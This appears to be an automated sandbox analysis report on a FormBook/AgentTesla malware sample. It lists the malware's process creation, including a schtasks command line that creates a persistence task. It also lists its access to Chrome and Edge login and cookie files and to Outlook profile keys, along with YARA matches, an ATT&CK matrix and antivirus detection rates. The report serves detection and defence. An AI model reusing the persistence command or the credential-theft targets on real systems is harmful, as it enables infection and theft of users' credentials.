Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ydRhqlPsLsIczR" /XML "C:\Users\user\AppData\Local\Temp\tmp99F9.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process created: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe "C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process created: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe "C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Process created: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe "C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe"	Jump to behavior
Source: C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe	Process created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Source: IBBkYiJCUMDfM.exe, 00000014.00000000.1902660421.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000014.00000002.4058756044.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000016.00000002.4059411174.0000000000E91000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: IBBkYiJCUMDfM.exe, 00000014.00000000.1902660421.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000014.00000002.4058756044.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000016.00000002.4059411174.0000000000E91000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: IBBkYiJCUMDfM.exe, 00000014.00000000.1902660421.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000014.00000002.4058756044.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000016.00000002.4059411174.0000000000E91000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: IBBkYiJCUMDfM.exe, 00000014.00000000.1902660421.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000014.00000002.4058756044.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, IBBkYiJCUMDfM.exe, 00000016.00000002.4059411174.0000000000E91000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Queries volume information: C:\Users\user\Desktop\zE1VxVoZ3W.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Queries volume information: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 9.2.zE1VxVoZ3W.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.zE1VxVoZ3W.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1996556197.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.4059491839.00000000022A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4059783841.0000000004580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4057661032.0000000002710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1993276336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1997237441.00000000028D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4059982269.0000000004620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\winver.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\winver.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 9.2.zE1VxVoZ3W.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.zE1VxVoZ3W.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1996556197.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.4059491839.00000000022A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4059783841.0000000004580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4057661032.0000000002710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1993276336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1997237441.00000000028D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4059982269.0000000004620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	412 Process Injection	1 Masquerading	1 OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Timestomp	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
zE1VxVoZ3W.exe	58%	Virustotal		Browse
zE1VxVoZ3W.exe	76%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
zE1VxVoZ3W.exe	100%	Avira	HEUR/AGEN.1306657
zE1VxVoZ3W.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	100%	Avira	HEUR/AGEN.1306657
C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe	100%	Joe Sandbox ML
